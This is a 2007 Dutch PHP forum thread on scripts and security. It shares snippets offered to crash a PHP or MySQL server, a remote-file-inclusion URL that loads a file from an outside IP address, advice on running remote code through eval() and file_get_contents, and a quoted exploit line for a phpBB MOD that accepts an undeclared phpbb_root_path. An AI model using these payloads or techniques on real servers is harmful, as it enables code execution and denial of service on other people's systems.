Scripts en veiligheid
Geplaatst: 23 apr 2007, 18:19
Wil iemand z'n PHP server laten crashen?
Code: Selecteer alles
function a() { a(); } a();
Code: Selecteer alles
function a() { a(); } a();
Code: Selecteer alles
$sql = 'SELECT user_id FROM . ' USERS_TABLE;
$result = $db->sql_query($sql);
while ($result = $db->sql_query($sql))
{
var_dump($row);
}
Wat bedoel jeSalomon schreef:Weet iemand een onbeveiligde pagina die gewoon $_GET['p'] included, zonder case oid?
(pag.php?p=http://193.84.187.29/0jgwq7/documents/lol.txt)
Jep, die zou je MySQL-server ook crashen...paul schreef:toch vink deze leuker:Code: Selecteer alles
$sql = 'SELECT user_id FROM . ' USERS_TABLE; $result = $db->sql_query($sql); while ($result = $db->sql_query($sql)) { var_dump($row); }
Je wilt via GET een externe pagina inladen? Je kan geen PHP scripts parsen vanaf een andere server, dit kan wel:Salomon schreef:<?php
include($_GET['p'];
?>
En als ik dan mijn bestand include
Code: Selecteer alles
<?php
echo get_file_contents($_GET['p']);
?>
Nha, mijn mysql server houd het wel een 60 seconden vol, daarna exit phpBas schreef:Jep, die zou je MySQL-server ook crashen...paul schreef:toch vink deze leuker:Code: Selecteer alles
$sql = 'SELECT user_id FROM . ' USERS_TABLE; $result = $db->sql_query($sql); while ($result = $db->sql_query($sql)) { var_dump($row); }
Ik had gelezen dat het wel kon, als een bepaalde optie aanstaat (uitzetten dusElbertF schreef:Je wilt via GET een externe pagina inladen? Je kan geen PHP scripts parsen vanaf een andere server, dit kan wel:Salomon schreef:<?php
include($_GET['p'];
?>
En als ik dan mijn bestand include
Code: Selecteer alles
<?php echo get_file_contents($_GET['p']); ?>
Dus dan heb je gelijk.Als de "URL fopen wrappers" zijn ingeschakeld (in de default configuratie is dit het gevel), dan kun je een file ook include()n met een URL, in plaats van een lokale path naam.
Nooit gehoord van get_file_contents, wel van file_get_contentsElbertF schreef:Je kan geen externe bestanden includen. Maar met de eval() functie kun je wel code parsen uit een extern bestand, in combinatie met bijv. get_file_contents(). Het bestand mag inderdaad geen PHP extentie hebben.
http://php.net/eval
Sowieso, dan kan je het nu nog niet gebruiken, ALS het al zo zou zijn(Jongen van twaalf *dist* de beheerder van phpBB.nl 2 keer in 5 minuten )
*dist* = moderne spreektaal
Code: Selecteer alles
Vulnerable in MOD_forum_fields_parse.php: include($phpbb_root_path . 'MOD_forum_fields_default.php');
#$phpbb_root_path is not declared!
[+]Exploit: http://[target]/[module_path]/MOD_forum_fields_parse.php?phpbb_root_path=FILE